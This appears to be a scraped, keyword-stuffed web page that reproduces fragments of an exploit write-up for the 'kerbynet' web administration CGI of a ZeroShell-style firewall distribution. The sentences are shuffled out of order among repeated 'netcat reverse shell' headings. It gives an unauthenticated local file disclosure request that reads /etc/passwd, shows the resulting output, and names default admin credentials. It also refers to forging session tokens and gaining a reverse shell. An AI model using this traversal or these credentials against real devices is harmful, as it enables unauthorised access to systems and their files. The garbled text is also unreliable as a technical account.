This variable is used in GET url as param, and in hidden input field of form too. cgi / scripts / localman apache : x : 1000 : 100 :: / home / apache : nobody : x : 1001 : 100 :: / home / nobody : sshd : x : 50000 : 100 :: / home / sshd : / bin / false bin : x : 1 : 1 :: / home / bin : quagga : x : 0 : 100 :: / home / quagga : havp : x : 50002 : 50002 : HTTP AntiVirus Proxy : / home / havp : / bin / false Proof of Concept 2 : Generate a valid admin session token = As we said, all administration request need a valid session token named "STk". PoC : http : // com / cgi - bin / kerbynet ? Section = NoAuthREQ & Action = Render & Object =./././ etc / passwd Results : root : x : 0 : 0 : root : / root : / bin / bash admin : x : 0 : 0 : root : / root : / root / kerbynet. cgi / template / About So we can deduce that this url can be used to a local file disclosure vulnerability.
#Netcat reverse shell without e with vpn license
The license is located in the file : / root / kerbynet. Proof of Concept 1 : Local File Disclosure = About 's url is the following : http : // com / cgi - bin / kerbynet ? Section = NoAuthREQ & Action = Render & Object = About As we can see, this url doesn 't need a token session to print the GPN license of the distribution.
#Netcat reverse shell without e with vpn full
For the next part of this PoC, only one script is exploited to gain a full remote reverse shell. cfg / sudoers Many of these scripts can be exploited to execute arbitrarly command in the system through the WebGUI. To see the administratives rights of this user, cat the file : cat / root / kerbynet. This user is restricted and can only run a white list of command and all script sh linked to the kerbynet. The WebGUI running with the "apache" user.
![netcat reverse shell without e with vpn netcat reverse shell without e with vpn](https://1.bp.blogspot.com/-lmYwhMBaX8M/X_5yreD82TI/AAAAAAAA9x0/QbDLRkVTaJwoQqHDBQEh94dySgAJS1ZSACLcBGAsYHQ/s719/10-1.png)
There are few pages which can be requested without an authentification token like the GPL license, X. A session token is needed through each administration page. For all main administration action, the admin user need to be loggued ( Unix account admin / zeroshell by default for console, SSH and WebGUI ). There are also all templates html file located in / root / kerbynet.
![netcat reverse shell without e with vpn netcat reverse shell without e with vpn](https://i.ytimg.com/vi/fEL3cN2_71c/maxresdefault.jpg)
Introduction to the PoC : = In this distribution, the managment website is a binary file named "kerbynet" interpreted in cgi - bin directory here : / cdrom / usr / local / apache2 / cgi - bin / kerbynet So all url look like this : http : // com / cgi - bin / kerbynet ? Section =& STk =& Action =&= This binary file routes the params ( GET / POST ) to dedicated script ( mainly in sh ) in the / root / kerbynet.